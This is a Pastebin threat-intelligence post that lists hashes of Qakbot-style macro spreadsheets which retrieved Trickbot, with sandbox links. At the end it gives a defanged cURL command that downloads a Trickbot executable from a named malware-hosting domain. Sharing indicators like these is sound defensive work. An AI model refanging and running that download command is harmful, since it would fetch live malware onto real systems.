Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 2020-11-11 (WED) - QAKBOT-STYLE SPREADSHEETS WITH MACROS THAT RETRIEVED TRICKBOT GTAG ROB3
- - 25b5643ebf2b00aacc88e19661d3915292c8983fdab8285175e13d8361056049 1_1011998499_11102020.xlsb
- - 32ad29562b57f4a858f5a0c79cbece7fbf81e4be815683a59943ae2eeaff110e 1_468135799_11102020.xlsb
- - 428832a6e6615a5b78f41ca2f90e782045e255f862c8c440062a0a72b3a8066b 1_1712758087_11102020.xlsb
- - 5696a4baae57dc899e6ac080bc726eaa139145dda19aa4c1ef148af6a0b96029 1_1607027682_11102020.xlsb
- - 67d02f2c249e8cd5aec67011741c8b032c6183e5039d504114e5ca5467e1c676 1_1646832256_11102020.xlsb
- - a309de46c45dcd82aa88bc99879ddf2aac191c1b85cb4094d37e58a2497fbe27 1_766416357_11102020.xlsb
- - bcc5d1d20d8713ea6d234dc1d55655bc92de83aeda6dc7bc1f1b4175d3d5319a 1_867342178_11102020.xlsb
- - c4dc4cce2725af46f08a80d9606fdb57a6309d2af965a686f026285554c5d8ba 1_1900530932_11102020.xlsb
- - ede77e7ae3bfe914b166bca8472fb4b3bfb8f3f6fecb9ec71af176db0c82394f 1_359571260_11102020.xlsb
- - ee2aa25e17e1dc6c6fa86f16e6d7275304dc4309acfffe1d7efc2953cda4e5ee 1_1975618945_11102020.xlsb
- - f03c558a0f6b15ca48abaa95c0a5db24d5b2bd3cd6448bd1a8147a1288343d23 1_2143892845_11102020.xlsb
- NOTES:
- - Example XLSB at: https://app.any.run/tasks/b4bad049-effe-46df-bf1a-7d2384f9f34c
- - Follow-up EXE at: https://app.any.run/tasks/0c133828-8185-473f-a14a-47183ad94687
- You can grab one of the Trickbot EXE files with the following cURL command (defanged, so you'll have to "fang" it):
- curl -A "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" -o Trickbot-gtag-rob3.exe hxxps:/www.korporatellc[.]com/aacclksiw2%20iesod%20eqi.jpg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement